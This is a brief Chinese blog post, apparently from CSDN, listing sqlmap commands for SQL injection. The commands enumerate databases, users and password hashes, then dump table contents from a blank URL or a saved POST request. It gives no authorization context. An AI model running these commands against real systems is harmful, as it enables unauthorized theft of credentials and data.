sqlmap语句

将url、cookie放到-u、cookie的参数里
sqlmap.py -u “” //查看应用服务器信息、可进行注入的漏洞类型
sqlmap.py -u “” --cookie="" --dbs --level=2 //查看应用服务器的所有实例
sqlmap.py -u “” --cookie="" --current-db --level=2 //查看当前实例
sqlmap.py -u “” --cookie="" --current-user --level=2 //查看当前用户
sqlmap.py -u “” --cookie="" --passwords --level=2 //查看当前用户的密码
sqlmap.py -u “” --cookie="" -D “cwbase001” --tables //通过上述得到权限,列举当前实例的表
sqlmap.py -u “” --cookie="" -D “cwbase001” -T “dbo.SYNC_ZWKMFZSZ2013_1__74” --columns //列举表中的字段
sqlmap.py -u “” --cookie="" -D “cwbase001” -T “dbo.SYNC_ZWKMFZSZ2013_1__74” -C “ZWKMFZSZ_DWBH” --start 1 --stop 10 --dump //暴表,对于记录数很多的情况,可以仅显示前10条
post逐步注入的命令样例:
由于post请求内容比较多,可以使用下面的办法,简化操作。将fiddler跟出的请求保存成txt,放到sqlmap安装目录下,使用下面语句进行扫描,下面输入了dbms以加快扫描的速度。
Sqlmap.py –r XXX.txt
Sqlmap.py –r XXX.txt --dbs
Sqlmap.py –r XXX.txt –D database --tables
Sqlmap.py –r XXX.txt –D database –T table --columns
Sqlmap.py –r XXX.txt - D database –T table --dump

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值